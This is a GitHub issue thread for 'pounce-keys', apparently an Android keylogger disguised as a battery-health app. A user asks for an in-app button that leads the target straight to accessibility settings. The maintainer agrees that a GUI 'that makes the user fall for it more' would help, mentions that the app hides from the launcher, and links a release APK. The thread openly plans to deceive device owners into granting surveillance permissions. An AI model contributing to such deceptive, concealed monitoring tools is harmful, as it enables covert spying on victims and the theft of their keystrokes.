### ISSUE TITLE
NEED A SIMPLE GUIDE IN APP TO GO TO ACCESSIBILITY SETTINGS WITHIN THE APP

### ISSUE THREAD

**Issue by shubhammaurya9393** [NullPounce/pounce-keys#19]
U should make the app to open and ask for enabling accessibility service and then a button that will lead the user to the accesibility setting and then the app (battery health)  coz it is mind disturbing to tell some to open settings search accesibility there then enable it

**Comment by NullPounce** [comment]
haha yeah I feel ya, as of now physical access is king and the latest hides from the home screen and the launcher I believe, There is no GUI for the APK but this would be a good idea to implement. It's already a OEM looking battery update health thing or whatever so a simple GUI that makes the user fall for it more sounds nice + hiding it.

**Comment by NullPounce** [comment]
https://github.com/NullPounce/pounce-keys/releases/download/Pounce-Keys-Discord/Discord_GUI_Button.apk

https://private-user-images.githubusercontent.com/28081004/309625745-603ae2bd-1544-444d-a177-2cf1dda98541.mp4?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MDk1MzM3NDksIm5iZiI6MTcwOTUzMzQ0OSwicGF0aCI6Ii8yODA4MTAwNC8zMDk2MjU3NDUtNjAzYWUyYmQtMTU0NC00NDRkLWExNzctMmNmMWRkYTk4NTQxLm1wND9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDAzMDQlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwMzA0VDA2MjQwOVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTc2ZjI2NTZmNDQ2NDFjMDAyNWUwNTEyMmQxZTBlM2U3MDIwZWZjOWYwOTFjZWVlMjQ4MTU2NjIzMWI4MGM2M2MmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.f8Xjl3zdwXYTA-J_h8jIwz04nn_LWy8p9Rc2PhCTOPs
